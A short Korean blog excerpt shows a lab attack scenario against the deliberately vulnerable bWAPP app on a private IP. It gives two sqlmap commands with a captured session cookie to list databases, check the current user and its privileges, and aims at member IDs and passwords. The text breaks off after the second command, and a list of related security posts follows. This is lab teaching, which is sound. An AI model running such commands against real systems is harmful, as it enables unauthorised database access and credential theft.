sqlmap을 이용한 공격 시나리오 SQL Injection -GET/Search

sqli_1.php데이터베이스의 회원의 번호, 아이디, 패스워드 획득sqlmap을 이용한 데이터 정보를 획득하는 과정이다. burpsuite을 통한 쿠키값을 읽어와야 한다.#sqlmap -u "http://192.168.56.102/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=ecc56ecf32d6a2eb05e06077adaaadbc; security_level=0" -dbs--current-user, --is-dba, --privilege 옵션을 조합하여 권한을 획득한다.#sqlmap -u "http://192.168.56.102/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=ecc56ecf32d6a2eb05e06077adaaadbc; security_level=0" --current-user --is-dba --privilege..........

원문링크 : sqlmap을 이용한 공격 시나리오 SQL Injection -GET/Search

등록된 다른 글

sqlmap을 이용한 공격 시나리오 SQL Injection -GET/Search

등록된 다른 글

[Dreamhack] image-storage

[DataBase] SQL 이란 ? (데이터정의어, 데이터조작어, 데이터 제어어)

Windows 데스크톱 응용프로그램(Win32)

[백준-python] 4948번 : 베르트랑 공준

보안기사 - 윈도우 서버 보안(2)

A7 - Missing Function Level Access Control/ Directory Traversal - Directories

XML/XPath Injection - Search

A6 - Sensitive Data Exposure/ Base64 Encoding (Secret)

키자드 로그인

키자드

네이버 블로그

티스토리

커뮤니티